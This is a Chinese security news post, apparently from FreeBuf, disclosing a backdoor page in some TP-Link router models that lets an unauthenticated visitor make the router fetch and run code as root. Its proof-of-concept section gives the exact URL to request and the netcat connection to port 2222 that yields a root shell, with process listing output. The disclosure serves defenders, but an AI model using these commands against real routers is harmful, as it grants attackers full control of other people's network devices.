[POC]TP-Link路由器存在漏洞

2013-03-16 214075人围观 ,发现 15 个不明物体 漏洞

近日,国内漏洞平台乌云爆出了一个TP-LINK路由器的漏洞,随后国家信息安全漏洞共享平台CNVD收录该后门漏洞(收录编号:CNVD-2013-20783)。利用漏洞,攻击者可以完全控制路由器,对用户构成较为严重的威胁。具体情况通报如下:

TP-LINK部分型号的路由器存在某个无需授权认证的特定功能页面(start_art.html),攻击者访问页面之后可引导路由器自动从攻击者控制的TFTP服务器下载恶意程序并以root权限执行。攻击者利用这个漏洞可以在路由器上以root身份执行任意命令,从而可完全控制路由器。目前已知受影响的路由器型号包括: TL-WDR4300、TL-WR743ND (v1.2 v2.0)、TL-WR941N。 其他型号也可能受到影响。这些产品主要应用于企业或家庭局域网的组建。

测试固件为最新的 (发布于2012年12月25日)


POC:

root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"

    [ <=>                                   ] 426         --.-K/s   in 0s

2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

root@secu:~# nc 192.168.0.1 2222
ps
  PID  Uid     VmSize Stat Command
    1 root        404 S   init
    2 root            SW< [kthreadd]
    3 root            SW< [ksoftirqd/0]
    4 root            SW< [events/0]
    5 root            SW< [khelper]
    6 root            SW< [async/mgr]
    7 root            SW< [kblockd/0]
    8 root            SW  [pdflush]
    9 root            SW  [pdflush]
   10 root            SW< [kswapd0]
   17 root            SW< [mtdblockd]
   18 root            SW< [unlzma/0]
   71 root       2768 S   /usr/bin/httpd
   76 root        380 S   /sbin/getty ttyS0 115200
   78 root        208 S   ipcserver
   82 root       2768 S   /usr/bin/httpd
   83 root       2768 S   /usr/bin/httpd
   86 root        732 S   ushare -d -x -f /tmp/ushare.conf
   92 root        348 S   syslogd -C -l 7
   96 root        292 S   klogd
  101 root            SW< [napt_ct_scan]
  246 root        348 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  247 root        204 S   /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
  251 root        364 S   /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
  286 root       2768 S   /usr/bin/httpd
  299 root       2768 S   /usr/bin/httpd
  300 root       2768 S   /usr/bin/httpd
  305 root       2768 S   /usr/bin/httpd
  307 root       2768 S   /usr/bin/httpd
  309 root       2768 S   /usr/bin/httpd
  310 root       2768 S   /usr/bin/httpd
  389 root       2768 S   /usr/bin/httpd

详细信息:

经过HTTP请求发送如下请求:

http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html

路由器下载了一个(nart.out)文件,从主机,存在的http请求并执行了root权限:

POC  图


示例展示 获得了从主机发出的HTTP请求:


利用Wireshark过滤功能来显示路由器的TFTP流量


nart.out tftp 请求

受影响的型号

TL-WDR4300

TL-WR743ND (v1.2 v2.0) 

PS:sorry,周末小编们都在享受愉快的假期(请谅解我们上有老,下有小,在痛苦的一周工作之余不得不抽出点时间陪陪家人),所以网站文章的审核速度会相对慢一些,导致LinuxSpace同学投递的这篇文章到现在才发布,有会员对此提出了意见,今后我们会尽力跟上速度,在收到文章的第一时间审核发布 :)最后祝freebuf所有忠实的朋友周末愉快!

这些评论亮了

  • HCocoa 回复
    喂喂 这种N久之前国外就发过的东西翻译一下就来投稿也可以发吗?
    )24( 亮了
  • root (7级) 回复
    @HCocoa 很多技术工具等在国外是早就发过,但是国内因各种因素制约获取这些信息有一定限制,不是每个阅读freebuf的朋友都是技术很高深,能够通过其他渠道获取这些资源。所以LinuxSpace投递的该文,我们经过审核之后决定还是发布,freebuf的精神是open、share、free,也希望能让更多的人参与到我们一起,共同打造这样一个乐于分享的平台 :)
    )7( 亮了
发表评论

已有 14 条评论

取消
Loading...
css.php